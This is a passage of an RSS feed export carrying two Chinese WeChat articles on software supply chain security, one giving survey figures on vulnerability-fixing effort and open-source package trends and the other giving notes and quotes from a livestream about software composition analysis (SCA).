0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">7. 建议在开发阶段就做好安全防范，这比在运行阶段修复问题的成本更低。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">8. 需要开发相应工具来及早发现和防范AI应用中的安全问题。</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);"> </span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">    </span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">数据：安全漏洞修复需要投入</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">25%</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">的事件</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 企业安全工具使用情况：30%的企业使用10种以上的安全审核工具，数量之多令人惊讶。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 漏洞修复时间投入：25%的团队研发时间用于修复漏洞，60%的团队每月花费4天（约20%工作时间）处理应用程序漏洞。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 国内外企业对比：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>国外企业对安全修复的重视程度高于国内企业。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>国外企业多使用持续提供安全修复的企业版操作系统。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>国内部分企业仍在使用老旧版本系统（如CentOS 7）。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 国内行业差异：金融、制造业、智能制造和高科技企业对安全修复较为重视，其他行业相对不那么紧迫。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 漏洞修复的复杂性：涉及版本替换、重新打包、测试、上线，以及影响范围定位等多个环节，特别是生产环境中的漏洞修复难度更大。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 未来方向：研究如何防止高危漏洞版本进入生产环境，这是供应链管理需要解决的核心问题。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">数据：开源语言包增长趋势</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 软件供应链安全意识提升：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>89%的团队使用SLSA框架评估软件供应链成熟度</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>92%的团队检测恶意开源软件</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>42%的开发者在引入开源软件时进行扫描</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 开源社区语言包增长趋势：</span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>Docker Hub和npm（Node.js）在2023年异常活跃</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>Golang的增量包数量超过Maven，显示出较高的活跃度</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>趋势表明开发者越来越倾向于使用Go和Python，而非Java（Maven）</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 技术栈选择建议：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>基于语言包增长趋势，建议在选择技术栈时考虑Go和Python等活跃度高的语言</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> </span></p><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;">          <o:p> </o:p></span>    <o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484062">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=dba560e1&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247484062%26idx%3D1%26sn%3D093adf53b53e1d9a94a74bceac79e111%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 06 Jul 2024 16:03:00 +0800</pubDate>
    </item>
    <item>
      <title>你是想当个网络安全“装机工”，还是想从源头重塑安全体系？</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484043&amp;idx=1&amp;sn=a14c7ebe5537687392a220c82598ccd5</link>
      <description>今天无论是甲方还是乙方的网安从业者，都面临着一个重要的选择。</description>
      <content:encoded><![CDATA[<p>
原创 <span>Heracles</span> <span>2024-07-03 12:34</span> <span style="display: inline-block;">上海</span>
</p>

<p>今天无论是甲方还是乙方的网安从业者，都面临着一个重要的选择。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=79b68452&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINwMjZkHduL1qDX7Ugiaephs6xk9TPAwFicibVddjctLGPribL5mKRMupnd4lnrL0ssx0CGiakVhhYQRxww%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#888888;mso-font-kerning:0.0pt;">“ 你是想卖一辈子糖水,还是想跟我一起去改变世界? ”</span></p><p style="text-align: right;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#888888;mso-font-kerning:0.0pt;">~乔布斯，1983</span></p><p style="margin-left: 0pt;letter-spacing: 0.578px;text-indent: 0pt;text-wrap: wrap;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 12pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(136, 136, 136);">“ 你是想当个网络安全‘装机工<span style="color: rgb(136, 136, 136);font-family: 宋体;font-size: 16px;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;">’</span>，还是想从源头重塑安全体系？”</span></p><p style="margin-left: 0pt;letter-spacing: 0.578px;text-indent: 0pt;text-wrap: wrap;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: right;"><span style="font-size: 12pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(136, 136, 136);">~网安同仁，就现在</span></p><p><span style="font-size: 12pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">前几天看了安在直播的</span><a href="https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&amp;mid=2247624392&amp;idx=3&amp;sn=dfc27182130921ea7976919f35aa502a&amp;scene=21#wechat_redirect" data-linktype="2" style="font-family: 宋体;font-size: 12pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;"><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">软件供应链安全，SCA可堪重用？</span></a><span style="font-size: 12pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">三位嘉宾眼界明亮，主</span><span style="font-size: 12pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">持人颇有老罗风范，专业性和趣味性都很强。我做了点笔记，大家一起学习进步。</span></p><p><span style="font-size: 12pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">我的感觉是，目前无论是甲方还是乙方的网安从业者，都面临着一个重要的选择：你是想当个网络安全“装机工”，还是想从源头重塑安全体系？——是继续停留在表面的防护，还是深入到体系的重塑？</span></p><p><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;letter-spacing: 0.034em;text-align: left;text-indent: 0pt;">主持人启发我们反思工作惯性，</span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;letter-spacing: 0.034em;text-align: left;text-indent: 0pt;">而嘉宾的观点让我们隐约窥见了在软件源头重塑安全体系的门径</span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;letter-spacing: 0.034em;text-align: left;text-indent: 0pt;">。</span></p><p><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;letter-spacing: 0.034em;text-align: left;text-indent: 0pt;">能力不是可以轻易购买或伪装的商品，而是通过持续学习、刻苦锻炼和实践应用而逐步积累的宝贵资产。让我们以专业、创新和坚韧的精神，挺直脊梁，一起学习进步，共迎挑战。</span></p><p><span style="font-size: 12pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">        </span><o:p style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;"><span style="font-size: 12pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);"> </span></o:p><o:p style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;"></o:p></p><p><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">金句摘抄</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 网络安全产品市场概况:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;甲方安全管理人员的工作，可以比喻为以前的电脑</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">装机</span><span style="color: rgb(255, 0, 0);font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;">工作</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">，现在则是在组织中&#39;拼装&#39;安全产品体系&#34;</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 供应链安全的重要性与挑战:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;科技战背景下</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">面，我们要实现软件自主化。虽然软件代码是可以自己编的，但是编程过程当中要用到很多开源的组件，组件的安全风险变成一个新的挑战&#34;</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 软件组件分析(SCA)技术:</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;源码、二进制、运行时SCA共同构成软件供应链开源治理的不同的手段，或者是一个技术路径，需要</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">联动</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 供应链安全工具的发展与需求:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;SCA只能满足</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">最低</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 